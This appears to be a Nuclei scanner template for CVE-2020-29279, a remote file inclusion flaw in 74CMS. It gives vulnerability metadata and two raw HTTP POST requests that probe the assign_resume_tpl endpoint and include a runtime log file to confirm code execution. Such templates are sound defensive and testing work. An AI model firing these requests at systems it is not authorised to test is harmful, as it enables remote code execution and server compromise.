id: CVE-2020-29279 info: name: 74CMS - Remote File Inclusion author: DhiyaneshDK severity: critical description: | PHP remote file inclusion in the assign_resume_tpl method in Application/Common/Controller/BaseController.class.php in 74CMS before 6.0.48 allows remote code execution. impact: | Remote attackers can execute arbitrary code on the server, potentially leading to full system compromise. remediation: | Update to version 6.0.48 or later. reference: - https://github.com/Ares-X/VulWiki/blob/master/Web%E5%AE%89%E5%85%A8/74cms/74cms%20v6.0.48%E6%A8%A1%E7%89%88%E6%B3%A8%E5%85%A5%2B%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%ABgetshell.md - https://www.wangan.com/p/7fyg8ka5a6f81cb6 - https://cloud.tencent.com/developer/article/1856739 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-29279 epss-score: 0.52881 epss-percentile: 0.98833 cpe: cpe:2.3:a:74cms:74cms:*:*:*:*:*:*:*:* metadata: vendor: 74cms product: 74cms fofa-query: app="骑士-74CMS" tags: cve,cve2020,74cms,rce,intrusive,file-upload,vkev,vuln variables: num: "999999999" http: - raw: - | POST /index.php?m=home&a=assign_resume_tpl HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded variable=1&tpl= matchers: - type: dsl dsl: - 'status_code == 404' - 'contains(content_type, "text/html")' - 'contains(body, "ThinkPHP")' condition: and internal: true - raw: - | POST /index.php?m=home&a=assign_resume_tpl HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded variable=1&tpl=data/Runtime/Logs/Home/{{replace(date_time("%Y"), "20", "")}}_{{date_time("%M_%D",unix_time())}}.log matchers-condition: and matchers: - type: word part: body words: - "PHP Version" - "{{md5(num)}}" condition: and - type: status status: - 200 # digest: 4b0a00483046022100adc634b60c89df5111c32b1e3391a5785ce2edd88b5d302ee25bbc4c9746ff59022100af2cba61dd82e05205451214d477743c6f227027b4c5e73fd19c7ffd9b8a60f0:922c64590222798bb761d5b6d8e72950